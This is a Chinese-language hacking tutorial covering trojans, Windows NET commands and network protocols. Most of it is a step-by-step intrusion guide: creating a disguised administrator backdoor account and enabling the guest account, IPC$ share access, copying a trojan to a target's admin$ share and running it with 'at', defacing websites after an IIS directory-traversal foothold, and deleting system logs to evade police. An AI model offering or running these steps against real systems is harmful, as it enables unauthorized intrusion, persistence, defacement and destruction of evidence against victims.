木马、网络命令、协议

3、木马的基本知识

尽管老资格的“黑客”不大会去使用木马，但我观察，绝大部分的入侵都是通过木马来进行的，比如小榕的一个 SRV.exe, 那也是木马中的一种啊。它的威力是众所周知的，一但被植入，就有被远程控制的可能，攻击者就可以象操作自己的机器一样控制你的机器，甚至可以远程监控你的 所有操作。

你必须去了解木马是如何侵入的？入侵的基本原理。在这里，我希望你会用它并且很熟悉的使用，记得当时我也是从接触木马开始的，它培养了我对黑客技术的兴趣。

当今比较流行的木马有冰河的木马，我曾经问它是否会继续开发冰河，他给了完全否定的答案，呵呵，并且说它的危害性太大了。 它的默认端口是 7626 。

BO2000 这个比较古老的木马了，一般那些资深的黑客也都使用过它。

我叫你了解和掌握使用方法，并不是说，叫你知道去破坏啊， or you are a badboy ！别误会，不是说你。并不需要你了解所有的木马，只要了解基本原理。

放送下，讲个故事给大家听吧：传说希腊人围攻特洛伊城，久久不能得手。后来想出了一个木马计，让士兵藏匿于巨大的木 马中。大部队假装撤退而将木马摈弃于特洛伊城下，让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来，与城 外的部队里应外合而攻下了特洛伊城。

4 、对网络命令的熟悉

1 ）、 NET

下面的操作你 TELNET 到对方主机上才会有效果。

你也可以在本地演示：

我要添加一个用户，为了让对方难察觉，最好贴加一个用户和系统用户差不多的

比如 admin

net user admin password /add

再将这个用户加到管理组

net localgroup administrator admin /add

这样就算一个后门做好了！这台机子也就可以说是你的肉鸡了。

net start telnet

这样可以打开对方的 TELNET 服务 .

为了防止 admin 用户被察觉

将 Guest 用户激活， guest 是 NT 的默认用户，而且很难删除的

net user guest /active:yes

这里是把一个用户的密码改掉，我们把 guest 的密码改为 lovechina 。

net user guest lovechina

一般 IPC$ 入侵用 NET 比较多吧

基本命令是

net use \\211.15.66.169\ipc% "123456" /user:"qiker" （这个 IP 是我的，可千万别黑哦）

123456 是密码， qiker 是用户

退出的命令是

net use \\\ipc$ /delte

先别急着退出，查看硬盘上的东西，就把它的 C 盘映射到我的 Z 盘吧！

net use z:\\211.15.66.169\c$

at 命令是用来运行程序的

一般你会复制一个木马上去

COPY C:\binhe.exe \\211.15.66.169\admin$

在运行之前，你还必须要先知道他的时间

net time \\211.15.66.169

将会返回一个时间

，这里假设时间为 2:05, 现在需要新建一个作业，其 ID=1

at \\211.15.66.169 2:07 binhe.exe

2 ）、 set

要黑别人网页必须要知道他的目录是在哪里的，默认情况一般会在 c:\inetup\wwwroot

登陆到对方机子打入 SET 命令就可以看到：

COMPUTERNAME=PENTIUMII

ComSpec=D:\WINNT\system32\cmd.exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=211.15.66.169

HTTP_ACCEPT_ENCODING=gzip, deflate

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

NUMBER_OF_PROCESSORS=1

Os2LibPath=D:\WINNT\system32\os2\dll;

OS=Windows_NT

Path=D:\WINNT\system32;D:\WINNT

PATHEXT=.COM;.EXE;.BAT;.CMD

PATH_TRANSLATED=E:\vlroot （大家看到这里没有，这就是网站的目录了。）

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel

PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0303

PROMPT=$P$G

QUERY_STRING=/c+set

REMOTE_ADDR=XX.XX.XX.XX

REMOTE_HOST=XX.XX.XX.XX

REQUEST_METHOD=GET

script_NAME=/scripts/..%2f../winnt/system32/cmd.exe

SERVER_NAME=XX.XX.XX.XX

SERVER_PORT=80

SERVER_PORT_SECURE=0

SERVER_PROTOCOL=HTTP/1.1

SERVER_SOFTWARE=Microsoft-IIS/3.0 对方使用 IIS/3.0

SystemDrive=D:

SystemRoot=D:\WINNT

TZ=GMT-9

USERPROFILE=D:\WINNT\Profiles\Default User

windir=D:\WINNT


要黑很容易，只要把自己准备好的网页替换上去就是了，默认主页名称一般会是 default.htm,default.asp,index.html,index.htm,index.asp

3 ）、 nbtstat

这个命令非常的重要，一般你也许会听说 139 端口开着有多危险，因为你只要开着，就可以通过 NETSTAT 来得到用户，只要破解出来了， 那你的机子就完蛋了。

命令是

nbtstat -A XX.XX.XX.XX

-A 一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

Registered Registered Registered Registered Registered Registered Registered Reg

istered Registered Registered Registered

MAC Address = 00-E0-29-14-35-BA

PENTIUMII <00> UNIQUE

PENTIUMII <20> UNIQUE

ORAHOTOWN <00> GROUP

ORAHOTOWN <1C> GROUP

ORAHOTOWN <1B> UNIQUE

PENTIUMII <03> UNIQUE

INet~Services <1C> GROUP

IS~PENTIUMII...<00> UNIQUE

ORAHOTOWN <1E> GROUP

ORAHOTOWN <1D> UNIQUE

..__MSBROWSE__.<01> GROUP


<03> 前面的就是用户。


这里的用户是 PENTIUMII 。


4 ）、 attrib


这个是去只读命令

attrib -r index.htm

这个命令是把 index.htm 的只读属性去掉。

如果把“ - ”改为“ + ”则是把这个文件的属性设置为只读

attrib +r index.htm


5 ）、 netstat

这个命令，我称它为监听命令，只要我和某台机子通讯，我就可以得到他的 IP

netstat -an

不过你的速度一定要比快

6 ）、 echo

echo 奇客 >index.htm

echo 奇客 >>index.htm

第一个的意思是覆盖 index.htm 原有的内容，把“奇客”写进 index.htm 。

第二个的意思是把“奇客”加到 index.htm 里面。

“ >> ”产生的内容将追加进文件中，“ > ”则将原文件内容覆盖。

大家可以本地测试


7 ）、 del


现在的网警可不是喝粥的，不会两手发软，你还是赶快清理你的脚印，就是所谓的日志。

NT/2000 的日志有这些需要删除了。

del C:\winnt\system32\logfiles\*.*

del C:\winnt\ssytem32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log


用小榕的工具也可以，你只要把文件复制上去，再打几个命令，就行


5 、网络协议

1 ）、 TCP/IP 及其应用。 TCP/IP 是 Internet 上使用的协议，而 Internet 是世界上最大的互联网络。有关 TCP/IP 的各个方面，包括开放式通信模型、 TCP/IP 通信模型、 IP 网络中的命名和寻址机制、地址解析及反向地址解析协议、 DNS 域字服务器、 WINS 、地址发现协议、 IPv6 、 IP 网络中的路由协议 (RIP 、 OSPF 等 ) 、互联网打印协议、 LDAP 目录服务、远程访问协议、 IP 安全与防火墙。如何为 Windows 9x/NT 配置 TCP/IP ；如何使用 TCP/IP 应用程序，包括远程登录、 FTP 、 Web 浏览等

2 ）、还要了解 UDP 协议

比如我们使用的 QQ ，它就是通过 UDP 协议来传输信息的。不过它有个特征就是只管传输不管对方是否收到。

3 ）、 icmp 等几个协议

如果你想尽快接触那种可爱型的拒绝服务式攻击，你必须对这些了如指掌。

概念性分析：网络安全通过对黑客行为和各种攻击进行分类、分析，论述了如何在具体实践中对付黑客的入侵，如何维护系统的安全；讨论了计算机安全所涉及的法律问题以及如何在高风险环境中应用密码学知识来保护信息。